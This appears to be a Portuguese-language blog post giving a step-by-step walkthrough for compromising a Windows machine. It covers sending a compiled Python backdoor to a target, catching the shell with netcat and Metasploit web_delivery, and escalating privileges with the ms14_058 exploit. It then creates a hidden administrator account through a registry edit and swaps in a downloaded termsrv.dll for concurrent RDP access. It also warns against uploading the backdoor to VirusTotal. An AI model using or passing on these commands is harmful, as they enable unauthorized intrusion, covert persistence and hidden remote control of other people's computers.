SIMPLE BACKDOOR PYTHON PRIVILEGE ESCALATION ADD USER HIDE ADD DLL SIMULTANEOUS REMOTE DESKTOP

1 – Verifique seu ip, você pode usar esse script em python:https://github.com/msOlivers/PacketofScripts/tree/master/myIpPython ou em http://whatismyipaddress.com/
2 – Baixe o Simples Backdoor em:

ATENÇÃO:
Use judiciously
Do NOT upload VirusTotal or similiar websites
Do NOT upload public websites
Do NOT send the file via e-mail

Not following the above rules may result  in:
Your tests might be compromised
——————————————————–
Use criteriosamente
NÃO faça upload do arquivo para VirusTotal ou sites parecidos
NÃO carregue o arquivo para sites públicos
NÃO enviar o arquivo via e-mail

Não seguir as regras acima pode resultar em:
Seus testes pode ser comprometido

3 – Compile para exe usando py2exe, Como instalar o python e py2exe:

4 -Envie para o alvo
5 – Execulte o netcat modo de esculta:

  • nc -lvp numeroDaPorta

6 – Execulte o msfconsole com o exploit web delivery para ter uma sessão meterpreter para tentamos Escalonamento de privilégios

7 –  Na conexão com o netcat cole o comando obtido do web Delivery e aperte enter para execultar o exploit
8 – Va para o terminal do msfconsole e veja uma nova sessaão e entre nela para fazer a Escalonamento de privilégios, Comandos:

  • sessions -i 1
  • meterpreter > sysinfo – ver infomacao do alvo
  • meterpreter > getsystem – ver privilegios
  • meterpreter > getuid – ver nivel de usuario

9 – Fazendo Escalonamento de privilégios, comandos:

  • meterpreter > background
  • msf exploit(web_delivery) > use exploit/windows/local/ms14_058_track_popup_menu
  • msf exploit(ms14_058_track_popup_menu) > set SESSION 1
  • msf exploit(ms14_058_track_popup_menu) > set TARGET 0
  • msf exploit(ms14_058_track_popup_menu) > set ExitOnSession false
  • msf exploit(ms14_058_track_popup_menu) > set LHOST SEU_IP
  • msf exploit(ms14_058_track_popup_menu) > set LPORT SUA_PORTA
  • msf exploit(ms14_058_track_popup_menu) > run

Se sucesso o Escalonamento de privilégios você obtera nova sessão já ativada
10 – Adicionar um novo usuario oculto no alvo, Comando:

  • meterpreter > shel
  • cmd > net user NovoUsuario Senha_Usuario /add
  • cmd > net localgroup Administradores NovoUsuario /add
  • cmd > reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v NovoUsuario /t REG_DWORD /d 0 /f
  • cmd > exit

11 – upload DLL para habilitar Usuário Simultâneo em Área de Trabalho Remota, Comandos
– Obtenha a DLL(para windows 32 bits) no link: http://www.4shared.com/file/MLfeIwoeba/termsrv.html

  • meterpreter > pwd
  • meterpreter > cd ..
  • meterpreter > upload /root/termsrv.dll termsrv.dll
  • meterpreter > shell
  • cmd > MOVE /Y “%SYSTEMROOT%\system32\termsrv.dll” “%systemdrive%\termsrv.bak”
  • cmd > MOVE /Y termsrv.dll “C:\Windows\system32\

12 – Obtendo conexão RDP com o novo usuario, em um novo terminal Comando:

Have Fun

Não negue conhecimento, Compartilhe essa ideia com mais pessoas, para que outros possam aprender

 

By Moisés Oliver

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s